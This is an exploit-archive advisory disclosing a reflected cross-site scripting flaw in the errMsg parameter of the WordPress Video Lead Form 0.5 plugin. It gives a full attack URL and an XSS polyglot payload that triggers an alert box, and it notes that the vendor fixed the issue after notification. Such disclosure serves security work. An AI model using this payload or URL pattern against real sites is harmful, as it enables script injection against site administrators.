WordPress Video Lead Form 0.5 Cross Site Scripting

2012.11.30
Credit: Aditya Balapure
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

############################# Exploit Title : Video Lead Form Plugin Cross-Site Scripting Vulnerabilities which affects Wordpress URL Author: Aditya Balapure home: http://adityabalapure.blogspot.in/ Date: 24/11/12 version: 0.5 software link: http://wordpress.org/extend/plugins/video-lead-form/ ############################# Video Lead Form plugin description Video Lead Form is a sales and marketing dream tool. Many people use video as a means of engaging their visitors but then have to find awkward ways to ask their visitors to submit a contact or lead form. Video Lead Form solves this problem by embedding the form directly into the video. Users of Video Lead Form can choose where in the video the form should appear, either at the beginning, the end, or five seconds after the video starts. When a viewer submits the form, their information is emailed to you, simple as that. Video Lead Form can also be integrated with Salesforce for an even easier way to generate and manage sales leads. ########################## XSS location The Video Lead Form Plugin in Wordpress http://wordpress.org/extend/plugins/video-lead-form/ has a Reflective XSS vulnerability in the browser URL which affects Wordpress 3.4.2 (Platform Used) Original URL - http://localhost/wordpress/wp-admin/admin.php?page=video-lead-form&errMsg=%27;alert%28String.fromCharCode%2888,83,83%29%29//%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E Modified URL - http://localhost/wordpress/wp-admin/admin.php?page=video-lead-form&errMsg=%27;alert%28String.fromCharCode%2888,83,83%29%29//%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E Script Used- ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//"; alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> ########################## Vendor Notification 24/11/2012 to: - Vendor notified awaiting action 29/11/2012 - Fixed and closed

References:

http://adityabalapure.blogspot.in/
http://wordpress.org/extend/plugins/video-lead-form/


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top